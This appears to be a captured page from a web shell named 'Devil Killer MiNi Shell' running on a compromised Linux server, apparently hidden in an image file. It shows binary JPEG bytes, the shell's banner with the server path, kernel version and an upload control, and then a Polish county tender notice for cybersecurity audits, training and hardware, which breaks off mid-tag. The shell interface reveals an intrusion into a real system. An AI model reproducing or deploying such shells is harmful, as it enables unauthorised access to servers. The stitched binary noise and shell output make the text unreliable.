JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250212/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250212/0010093501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa oprogramowania, sprzętu komputerowego oraz usługi szkoleń dla pracowników starostwa powiatowego, audytów KRI, aktualizacji systemu zarządzania bezpieczeństwem informacji, ...” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Grodziski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411561513</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żwirki i Wigury 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grodzisk Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-065</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614452500</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">614452555</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">anijaki@spgw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.pgw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa oprogramowania, sprzętu komputerowego oraz usługi szkoleń dla pracowników starostwa powiatowego, audytów KRI, aktualizacji systemu zarządzania bezpieczeństwem informacji, ...” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2a438a47-05cf-40f0-80db-2f054c72c888</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00100935</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00014833/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa oprogramowania, sprzętu komputerowego oraz usługi szkoleń dla pracowników starostwa powiatowego, audytów KRI, aktualizacji systemu zarządzania bezpieczeństwem informacji, ...&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC) – Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2 „Wzmocnienie krajowego systemu cyberbezpieczeństwa” w ramach konkursu grantowego „Cyberbezpieczny Samorząd” - „Cyberbezpieczny Powiat Grodziski” o numerze FERC.02.02-CS.01-001/23. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://asystent.postepowania.pl/org/powiat-grodziski/postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://asystent.postepowania.pl/org/powiat-grodziski/postepowania</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy zakupowej Asystent Postępowania, pod adresem:<br/>https://asystent.postepowania.pl/org/powiat-grodziski/postepowania <br/>2.	W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między Zamawiającym, a Wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia <br/>oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych <br/>lub innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/inne odbywa się za pośrednictwem zakładki Komunikacja i formularza „Wyślij wiadomość”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformy zakupowej Asystent Postępowania poprzez kliknięcie <br/>przycisku „Wyślij wiadomość”.<br/>3.	Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem platformy zakupowej Asystent Postępowania. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany <br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na stronie postępowania Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformy zakupowej Asystent Postępowania do konkretnego Wykonawcy.<br/>4.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na www.asystent.postepowania.pl przesłanych przez Zamawiającego, gdyż system <br/>powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy zakupowej Asystent Postępowania (zwanej dalej „Asystent Postępowania”). Przy czym złożenie oferty następuje wyłącznie przy pomocy Asystenta Postępowania.<br/>5.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów <br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na www.asystent.postepowania.pl, tj.:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>- komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>- zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>- włączona obsługa JavaScript,<br/>- zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>- Szyfrowanie na www.asystent.postepowania.pl odbywa się za pomocą protokołu TLS 1.3.<br/>- Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Pozostałe wymaganie techniczne i organizacyjne znajdują się w SWZ - Rozdział I, ust. 3, pkt od 7 do 11.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, Zamawiający informuje, że:<br/>1.1.	Administratorem Państwa danych osobowych jest Starosta Grodziski; <br/>1.2.	Administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: iod@pgw.pl;<br/>1.3.	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, które jest prowadzone w trybie przetargu nieograniczonego;<br/>1.4.	odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 PZP;<br/>1.5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat <br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 PZP);<br/>1.6.	obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w przepisach PZP, związanym z udziałem w niniejszym postępowaniu;<br/>1.7.	w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do postanowień art. 22 RODO;<br/>1.8.	posiadają Państwo:<br/>	1.8.1.	zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać zobowiązani <br/>do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, <br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>	1.8.2.	zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych <br/>(z tym, że skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>	1.8.3.	zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo <br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej <br/>lub państwa członkowskiego);<br/>	1.8.4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uznają Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy RODO;<br/>1.9	nie przysługuje Państwu:<br/>	1.9.1. zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>	1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	1.9.3. zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>1.10 przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych osobowych przez administratora. Organem właściwym <br/>dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IG-DP.272.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest:<br/>1) Audyt SZBI oraz aktualizacja systemu zarządzania bezpieczeństwem informacji w tym polityki bezpieczeństwa informacji;	<br/>2) Szkolenie budujące świadomość cyberzagrożeń i sposobów ochrony dla pracowników starostwa w formie dostępu do platformy szkoleniowej;<br/>3) Szkolenia z testami socjotechnicznymi dla pracowników starostwa;<br/>4) Szkolenia specjalistyczne dla kadry zarządzającej starostwa z zakresu <br/>cyberbezpieczeństwa;<br/>5) Szkolenia specjalistyczne dla informatyków starostwa z zakresu cyberbezpieczeństwa.<br/>2. Szczegółowy opis przedmiotu zamówienia został opisany w załączniku nr 1a do SWZ dla Części 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72810000-1 - Usługi audytu komputerowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował <br/>następującymi kryteriami oceny ofert:<br/>1. Kryterium „Cena” (C) – 60% (maksymalnie 60 punktów)<br/>Ocena w ramach tego kryterium zostanie dokonana zgodnie z poniższym wzorem:<br/> C = (Cₘᵢₙ / Cₒf) × 100 × 60%<br/>gdzie:<br/>•	C – liczba punktów przyznanych danej ofercie w kryterium „Cena”,<br/>•	Cmin – najniższa zaoferowana cena brutto spośród wszystkich ofert,<br/>•	Cof – cena brutto oferty badanej,<br/>•	100 – wskaźnik stały,<br/>•	60% – procentowe znaczenie kryterium „Cena” w ocenie końcowej.<br/>Oferta z najniższą ceną brutto otrzyma 60 punktów, a pozostałe oferty proporcjonalnie mniej, zgodnie <br/>z powyższym wzorem.<br/>2. Kryterium „Termin wykonania przedmiotu umowy” (T) – 40% (maksymalnie 40 punktów).<br/>W ramach tego kryterium punkty będą przyznawane zgodnie z następującym podziałem:<br/>•	Wykonanie przedmiotu umowy w terminie do 120 dni (włącznie) – 40 punktów;<br/>•	Wykonanie przedmiotu umowy w terminie od 121 do 160 dni (włącznie) – 20 punktów;<br/>•	Wykonanie przedmiotu umowy w terminie powyżej 160 dni – 0 punktów.<br/>Ocena w tym kryterium nie podlega dalszym obliczeniom – przyznawana jest z góry na podstawie <br/>deklarowanego terminu realizacji w ofercie.<br/>3. Obliczenie oceny końcowej<br/>Końcowa ocena oferty (OK) zostanie obliczona jako suma punktów uzyskanych w obu kryteriach:<br/>OK=C+TOK = C + T <br/>gdzie:<br/>•	OK – ocena końcowa oferty,<br/>•	C – liczba punktów uzyskanych w kryterium „Cena”,<br/>•	T – liczba punktów uzyskanych w kryterium „Termin wykonania przedmiotu umowy”.<br/>Maksymalna liczba punktów, jaką może uzyskać oferta, wynosi 100.<br/>4. Zasady wyboru najkorzystniejszej oferty<br/>•	Oferta, która uzyska najwyższą liczbę punktów (OK), zostanie uznana za najkorzystniejszą.<br/>•	Jeżeli dwie lub więcej ofert uzyska tę samą liczbę punktów, Zamawiający przyzna zamówienie <br/>Wykonawcy, który zaoferował krótszy termin realizacji przedmiotu umowy.<br/>•	W przypadku dalszej równości decydującym kryterium będzie najniższa cena brutto.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa urządzeń i oprogramowania:<br/>1) Serwery do uruchomienia oprogramowania podnoszącego cyberbezpieczeństwo; <br/>2) System Network Access Control do izolacji sieci LAN w siedzibie Zamawiającego – 250 IP;<br/>3) Sprzęt NAS TYP I;<br/>4) Oprogramowanie do archiwizacji logów;<br/>5) Sprzęt NAS TYP II;<br/>6) System do inwentaryzacji sprzętu i oprogramowania oraz nadawania uprawnień – 80 licencji;<br/>7) System do ochrony przed wyciekiem danych dlp – 80 licencji;<br/>8) Biblioteka taśmowa – 1 szt.;<br/>9) Punkty dostępowe Acceess Point - 10 szt.;<br/>10) Przełączniki zarządzalne;<br/>11)	Zakup przestrzeni w chmurze do backupu;<br/>12)	Zakup i wdrożenie urządzeń UPS TYP I;<br/>13)	Zakup i wdrożenie urządzeń UPS TYP II.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz parametry techniczne urządzeń zostały opisane w załączniku nr 1b do SWZ dla Części 2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48822000-6 - Serwery komputerowe</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">31682520-1 - Awaryjne urządzenia wyłączeniowe</p> <p class="mb-0">35120000-1 - Systemy i urządzenia nadzoru i bezpieczeństwa</p> <p class="mb-0">31214100-0 - Przełączniki</p> <p class="mb-0">51610000-1 - Usługi instalowania urządzeń komputerowych i przetwarzania informacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert nie <br/>podlegających odrzuceniu, na podstawie nw. kryteriów oceny ofert, którym przyporządkowano następujące wagi określone udziałem procentowym: <br/>Cena (koszt) (Xc)	- 60,00 % / 60 pkt<br/>Okres gwarancji na sprzęt (Xg1) - 20,00 % / 20 pkt<br/>Okres gwarancji na oprogramowanie i wdrożenie (Xg2) -	20,00 % / 20 pkt.<br/>Maksymalna liczba uzyskanych punktów jaką może osiągnąć badana oferta przy uwzględnieniu określonych wag kryteriów to 100 punktów.<br/>Liczba punktów przyznana każdej z ocenianych ofert obliczona zostanie wg poniższego wzoru: <br/>Lp = Xc + Xg1 +Xg2<br/>gdzie: <br/>Lp - łączna liczba punktów przyznanych ofercie, <br/>Xc - liczba punktów przyznanych ofercie w oparciu o kryterium – cena (maksymalnie 60 pkt)<br/>Xg1 - liczba punktów przyznanych ofercie w oparciu o kryterium – okres gwarancji na sprzęt (maksymalnie 20 pkt) <br/>Xg2 - liczba punktów przyznanych ofercie w oparciu o kryterium – okres gwarancji na oprogramowanie (maksymalnie 20 pkt)<br/>Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. <br/>Punkty przyznawane za podane w pkt 1 kryteria będą liczone według wzorów matematycznych (wzory znajdują się w SWZ - Rozdział III poz. 35 pkt. 3).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span 